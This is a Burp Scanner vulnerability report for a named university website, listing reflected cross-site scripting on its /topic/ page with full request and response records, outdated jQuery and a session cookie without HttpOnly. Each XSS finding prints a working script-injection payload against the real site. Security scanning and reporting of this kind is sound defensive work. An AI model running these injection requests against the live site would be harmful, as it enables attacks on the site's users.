scan website http://www.tgu.edu.vn/

Burp Scanner Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.



                        Confidence
Severity       Certain   Firm   Tentative   Total
High           8         0      0           8
Medium         7         0      0           7
Low            1         1      0           2
Information    12        1      0           13

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

[Chart: number of issues (axis 0 to 7) by severity: High, Medium, Low]

1. Cross-site scripting (reflected)

There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
  • Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.tgu.edu.vn/topic/ [11387 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11387 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload mym2a"><script>alert(1)</script>g72qd was submitted in the 11387 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11387=mym2a"><script>alert(1)</script>g72qd HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=8hgqdfquccnug7lp9itk05d2t2;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:25 GMT
Connection: close
Content-Length: 16526

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11387=mym2a"><script>alert(1)</script>g72qd"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.2. http://www.tgu.edu.vn/topic/ [11408 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11408 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload xdy9r"><script>alert(1)</script>erfyh was submitted in the 11408 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11408=xdy9r"><script>alert(1)</script>erfyh HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:52:24 GMT
Connection: close
Content-Length: 16924

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=xdy9r"><script>alert(1)</script>erfyh"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.3. http://www.tgu.edu.vn/topic/ [11526 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11526 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload nudkn"><script>alert(1)</script>iip5q was submitted in the 11526 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11526=nudkn"><script>alert(1)</script>iip5q HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=gerbkpeqs7b1ruioj2u5m1i0k6;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:56:21 GMT
Connection: close
Content-Length: 25851

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11526=nudkn"><script>alert(1)</script>iip5q"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.4. http://www.tgu.edu.vn/topic/ [11539 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11539 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload pxout"><script>alert(1)</script>f2pqp was submitted in the 11539 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11539=pxout"><script>alert(1)</script>f2pqp HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=i336pgatekcsu1rjlqqrm8npn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:56:37 GMT
Connection: close
Content-Length: 36629

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11539=pxout"><script>alert(1)</script>f2pqp"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.5. http://www.tgu.edu.vn/topic/ [11542 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11542 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload uc50o"><script>alert(1)</script>exh0d was submitted in the 11542 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11542=uc50o"><script>alert(1)</script>exh0d HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=pu4sbkvs93q4posm0ci2b9t4t7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:51 GMT
Connection: close
Content-Length: 23619

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11542=uc50o"><script>alert(1)</script>exh0d"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.6. http://www.tgu.edu.vn/topic/ [11556 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 11556 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload jyqbj"><script>alert(1)</script>eyz6y was submitted in the 11556 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11556=jyqbj"><script>alert(1)</script>eyz6y HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=ph64imi6u9t1hdnakjoclp0gn5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:55:57 GMT
Connection: close
Content-Length: 27028

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11556=jyqbj"><script>alert(1)</script>eyz6y"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.7. http://www.tgu.edu.vn/topic/ [8044 parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The value of the 8044 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload oiv5t"><script>alert(1)</script>kuwhw was submitted in the 8044 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?8044=oiv5t"><script>alert(1)</script>kuwhw HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=dtqntjp4qof02c2mrhthnvhbp5;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 15:00:47 GMT
Connection: close
Content-Length: 16291

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?8044=oiv5t"><script>alert(1)</script>kuwhw"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-borde
...[SNIP]...
1.8. http://www.tgu.edu.vn/topic/ [name of an arbitrarily supplied URL parameter]

Summary

Severity:  High
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload l0vgp"><script>alert(1)</script>pxvdh was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/?11408=&l0vgp"><script>alert(1)</script>pxvdh=1 HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=t6tbq2c93ngipudm40emf5q9o7;path=/
Referer: http://www.tgu.edu.vn/

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 14:10:52 GMT
Connection: close
Content-Length: 16927

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.tgu.edu.vn/topic/?11408=&l0vgp"><script>alert(1)</script>pxvdh=1"
target="_blank"
style="background-color: #0166ff;
border: 1px solid #0166ff;
color: #fff;
cursor: pointer;
font-size: 12px;
padding: 5px;
-webkit-bor
...[SNIP]...
2. Vulnerable version of the library 'jquery' found

There are 7 instances of this issue:


2.1. http://www.tgu.edu.vn/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET / HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=nua92uhn6kujo9hf2h8ie0f3n1; path=/
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:37:40 GMT
Connection: close
Content-Length: 50699

<!DOCTYPE html>
<html ng-app="">
<head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Rem
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.2. http://www.tgu.edu.vn/dept/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dept/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dept/?7= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=6dq9h8q8fb17m85h8r0csi7ci1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:41:38 GMT
Connection: close
Content-Length: 30010

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.3. http://www.tgu.edu.vn/dept/topic/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dept/topic/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dept/topic/?6826= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=40dp26uc2c06i0fe7an6f7dvc6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:40:08 GMT
Connection: close
Content-Length: 26385

<!DOCTYPE html>
<html ng-app="">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.4. http://www.tgu.edu.vn/dept/topics/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dept/topics/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dept/topics/?0.292.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=t4eaoff04u3jc8e13kajkjhk27

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:40:11 GMT
Connection: close
Content-Length: 25264

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.5. http://www.tgu.edu.vn/dstt/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /dstt/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.12.4.min has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 3.0.0-beta1 (between 1.12.3 and 3.0.0-beta1).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /dstt/ HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=gc1lt2o1pii04nm5kvp7ipnr56

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:43:36 GMT
Connection: close
Content-Length: 3462

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html ng-app="">

<head>
<meta http-equiv="content-type" content="text/
...[SNIP]...
<script src="https://code.jquery.com/jquery-1.12.4.min.js">
...[SNIP]...
2.6. http://www.tgu.edu.vn/topic/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topic/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /topic/?11556= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=440ehrd3vr7uge6bmmovfq3kc2

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:44:59 GMT
Connection: close
Content-Length: 26991

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
2.7. http://www.tgu.edu.vn/topics/

Summary

Severity:  Medium
Confidence:  Certain
Host:  http://www.tgu.edu.vn
Path:  /topics/
Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 1.11.2 has known security issues.
For more information, visit those websites:
Affected versions
The vulnerability affects all versions prior to 1.12.0 (between 1.4.0 and 1.12.0).
Other considerations
The vulnerability might affect a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be considered a false positive.
The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request

GET /topics/?0.247.0.0= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=e6t9ucbd4hbcs274sfuhuronq7

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:39:10 GMT
Connection: close
Content-Length: 26129

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
...[SNIP]...
3. Cookie without HttpOnly flag set

Summary

Severity:  Low
Confidence:  Firm
Host:  http://www.tgu.edu.vn
Path:  /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: www.tgu.edu.vn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://www.google.com.vn/
Accept-Encoding: gzip, deflate
Accept-Language: vi,en;q=0.9
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
